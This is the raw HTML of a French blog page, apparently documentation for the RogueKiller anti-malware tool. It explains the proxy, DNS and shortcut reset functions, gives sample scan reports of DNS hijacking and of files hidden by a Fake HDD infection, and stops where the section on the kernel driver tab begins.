&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Si une configuration proxy est définie, alors elle sera&lt;span style="font-size: small;"&gt; visible après un &lt;i&gt;&lt;b&gt;Scan &lt;/b&gt;&lt;/i&gt;dans l&lt;span style="font-size: small;"&gt;'onglet &lt;i&gt;&lt;b&gt;Proxy&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, ou dans la section &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;R&lt;/span&gt;egistre &lt;/b&gt;&lt;/i&gt;dans le rapport&lt;/span&gt;. Le bouton &lt;i&gt;&lt;b&gt;Proxy RAZ &lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;permet de &lt;b&gt;réinitialiser la configuration proxy.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Une fois l&lt;span style="font-size: small;"&gt;a réinitialisation terminé, &lt;b&gt;un rapport texte est disponible&lt;/b&gt;&lt;span style="font-size: small;"&gt; en cliquant sur le bouton &lt;i&gt;&lt;b&gt;Rapport. &lt;/b&gt;&lt;/i&gt;Ce dernier est a&lt;span style="font-size: small;"&gt;ussi sur le bureau (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s1600/proxydns.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s640/proxydns.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Déclenchement de la réinitialisation de la configuration Proxy/DNS &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&amp;nbsp;&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;DNS RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;a &lt;a href="http://fr.wikipedia.org/wiki/Domain_Name_System"&gt;configuration DNS&lt;/a&gt; &lt;/span&gt;est une &lt;b&gt;configuration particulière d'accès au web&lt;/b&gt;, permettant &lt;span style="font-size: small;"&gt;de &lt;b&gt;rediriger le flux &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;internet entrant&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; vers une ad&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;resse IP&lt;/b&gt; &lt;span style="font-size: small;"&gt;particulie&lt;span style="font-size: small;"&gt;re. A la base, la configuration DNS sert à définir l&lt;span style="font-size: small;"&gt;e serveur DNS que l'on souhaite utiliser.&lt;span style="font-size: small;"&gt; En général, les utilisateurs mettent soit un serveur DNS dédié sur le réseau (en entre&lt;span style="font-size: small;"&gt;prise) soit &lt;a href="http://www.commentcamarche.net/faq/1496-serveurs-dns-des-principaux-fai"&gt;celui de leur fournisseur d'accès internet&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;Un serveur DNS est utilisé pour la résolution des noms d'hôtes, en simplifié à &lt;b&gt;associer un nom de domaine (www.google.fr) à une adresse IP (173.194.67.94)&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Un malware peut modifier la configuration DNS pour &lt;b&gt;envoyer les demandes de résolution vers un serveur vérolé&lt;/b&gt;. De cette manière, un serveur DNS vérolé peut renvoyer de mauvaises adresses IP à des demandes de sites légitimes, et ainsi &lt;b&gt;tromper l'utilisateur qui va se retrouver sur un site vérolé au lieu d'un site légitime&lt;/b&gt;. Un exemple de malware très connu utilisant ce genre d'attaques est &lt;a href="http://en.wikipedia.org/wiki/DNSChanger"&gt;&lt;i&gt;&lt;b&gt;DNS Changer&lt;/b&gt;&lt;/i&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Voici un exemple de configuration DNS. &lt;b&gt;RogueKiller effectue un premier tri grâce à une liste blanche&lt;/b&gt;, donc si une ligne apparait dans le programme, c'est qu'elle n'a pas été identifiée comme légitime. A partir de là, il faut donc &lt;b&gt;&lt;a href="http://www.geoiptool.com/fr"&gt;regarder vers quel pays&lt;/a&gt;/herbergeur pointe l'adresse IP&lt;/b&gt; et prendre une décision.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Entrees de registre: 3 ¤¤¤&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[DNS] HKLM\[...]\ControlSet001\&lt;/span&gt;&lt;br /&gt;
&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;Services\Interfaces\{E3608E44-...} : NameServer (200.13.249.101,200.13.224.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;254) -&amp;gt; FOUND&lt;br /&gt;
[DNS] HKLM\[...]\ControlSet002\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;Services\Interfaces\{E3608E44-&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;...} : NameServer (200.13.249.101,200.13.224.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;254) -&amp;gt; FOUND&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
Les lignes précédentes montrent une configuration DNS concernant une seule carte réseau (Interface)&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Si une configuration DNS est définie, alors elle sera&lt;span style="font-size: small;"&gt; visible après un &lt;i&gt;&lt;b&gt;Scan &lt;/b&gt;&lt;/i&gt;dans l&lt;span style="font-size: small;"&gt;'onglet &lt;i&gt;&lt;b&gt;DNS&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, ou dans la section &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;R&lt;/span&gt;egistre &lt;/b&gt;&lt;/i&gt;dans le rapport&lt;/span&gt;. Le bouton &lt;i&gt;&lt;b&gt;DNS RAZ &lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;permet de &lt;b&gt;réinitialiser la configuration DNS.&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Une fois l&lt;span style="font-size: small;"&gt;a réinitialisation terminé, &lt;b&gt;un rapport texte est disponible&lt;/b&gt;&lt;span style="font-size: small;"&gt; en cliquant sur le bouton &lt;i&gt;&lt;b&gt;Rapport. &lt;/b&gt;&lt;/i&gt;Ce dernier est a&lt;span style="font-size: small;"&gt;ussi sur le bureau (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s1600/proxydns.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s640/proxydns.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Déclenchement de la réinitialisation de la configuration Proxy/DNS &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;Racc. RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;e mod&lt;span style="font-size: small;"&gt;e &lt;i&gt;&lt;b&gt;Raccourci RAZ&lt;/b&gt;&lt;/i&gt; permet de faire réapparaitre des fichiers/raccourcis&lt;span style="font-size: small;"&gt; ou d&lt;span style="font-size: small;"&gt;os&lt;span style="font-size: small;"&gt;siers ayant été masqué par les rogues de type &lt;b&gt;&lt;i&gt;Fake HDD &lt;/i&gt;&lt;/b&gt;(System res&lt;span style="font-size: small;"&gt;tore, File restore&lt;span style="font-size: small;"&gt;, System Fix, ...). Une démonstration est proposée &lt;b&gt;dans l&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;a vidéo ci-après&lt;/b&gt;. Ce mode n'e&lt;span style="font-size: small;"&gt;st pas à utiliser à la légère, &lt;b&gt;ne l'utiliser réellement que dans ce type d'infection&lt;span style="font-size: small;"&gt;! &lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Le traiteme&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;nt peut prendre du temps&lt;/b&gt; (quelques minut&lt;span style="font-size: small;"&gt;es), merci de pat&lt;span style="font-size: small;"&gt;iente&lt;span style="font-size: small;"&gt;r jusqu'à la fin. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/_i4tSOn5FkM/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_i4tSOn5FkM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="600" height="375"  src="http://www.youtube.com/v/_i4tSOn5FkM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Voici un exemple de rapport obtenu dans &lt;span style="font-size: small;"&gt;ce mode&lt;span style="font-size: small;"&gt;. &lt;b&gt;Ce dernier montre dans quels &lt;span style="font-size: small;"&gt;répertoire&lt;/span&gt; il a retrouvé&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; et res&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;tauré des fichiers cachés&lt;/b&gt;, et combien.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Le &lt;span style="font-size: small;"&gt;répertoire&lt;/span&gt; &lt;i&gt;&lt;b&gt;Sauvegarde &lt;/b&gt;&lt;/i&gt;cor&lt;span style="font-size: small;"&gt;respond à un endroit bien précis ou le &lt;b&gt;malware Fake HDD déplace les raccourci d&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;u menu démarrer, du bureau&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;, ...&lt;/b&gt; Le nombre de fichiers restaurés dans cette ligne correspond à ce qui a pu être &lt;span style="font-size: small;"&gt;retrouvé et remis à sa place. L&lt;span style="font-size: small;"&gt;a section &lt;i&gt;&lt;b&gt;Lecteurs &lt;/b&gt;&lt;/i&gt;montre les lecteurs ph&lt;span style="font-size: small;"&gt;ysiques &lt;span style="font-size: small;"&gt;traités (Restored) ou ignorés (Skipped).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Attributs de fichiers restaures: ¤¤¤&lt;/span&gt;
&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;Bureau: Success 6675 / Fail 0&lt;br /&gt;
Lancement rapide: Success 7 / Fail 0&lt;br /&gt;
Programmes: Success 24786 / Fail 0&lt;br /&gt;
Menu demarrer: Success 430 / Fail 0&lt;br /&gt;
Dossier utilisateur: Success 6583 / Fail 0&lt;br /&gt;
Mes documents: Success 131315 / Fail 0&lt;br /&gt;
Mes favoris: Success 8 / Fail 0&lt;br /&gt;
Mes images: Success 0 / Fail 0&lt;br /&gt;
Ma musique: Success 0 / Fail 0&lt;br /&gt;
Mes videos: Success 0 / Fail 0&lt;br /&gt;
Disques locaux: Success 44060 / Fail 0&lt;br /&gt;Sauvegarde: [FOUND] Success 125468 / Fail 0 / Exists 1&lt;br /&gt;&lt;br /&gt;Lecteurs:&lt;br /&gt;[C:] \Device\HarddiskVolume1 -- 0x3 --&amp;gt; Restored&lt;br /&gt;[D:] \Device\CdRom0 -- 0x5 --&amp;gt; Skipped&lt;br /&gt;[Z:] \Device\VBoxMiniRdr\;Z:\VBOXSVR\Shared -- 0x4 --&amp;gt; Skipped&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Une fois l&lt;span style="font-size: small;"&gt;a réinitialisation terminé, &lt;b&gt;un rapport texte est disponible&lt;/b&gt;&lt;span style="font-size: small;"&gt; en cliquant sur le bouton &lt;i&gt;&lt;b&gt;Rapport&lt;/b&gt;. &lt;/i&gt;Ce dernier est a&lt;span style="font-size: small;"&gt;ussi sur le bureau (RKReport[#]&lt;span style="font-size: small;"&gt;.txt). &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-CClHciuXkQ4/UIpYW2-FcJI/AAAAAAAAAQ8/EZvJfVvRWyY/s1600/raccourcis.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-CClHciuXkQ4/UIpYW2-FcJI/AAAAAAAAAQ8/EZvJfVvRWyY/s640/raccourcis.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Déclenchement de la réinitialisation des raccourcis&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;O&lt;span style="font-size: large;"&gt;NGLET DRIVER&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;'onglet &lt;i&gt;&lt;b&gt;Driver &lt;/b&gt;&lt;/i&gt;regroupe toutes les informations provenant du module &lt;b&gt;&lt;i&gt;TrueSight&lt;/i&gt;&lt;/b&gt;, le driver kerne&lt;span style="font-size: small;"&gt;l de RogueKiller.&lt;span style="font-size: small;"&gt; Ce driver est surtout utilis&lt;span style="font-size: small;"&gt;é pour la &lt;b&gt;recherche de rootkits dans le noyau Windows&lt;/b&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;La recherche concern&lt;span style="font-size: small;"&gt;e plusieurs sections:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
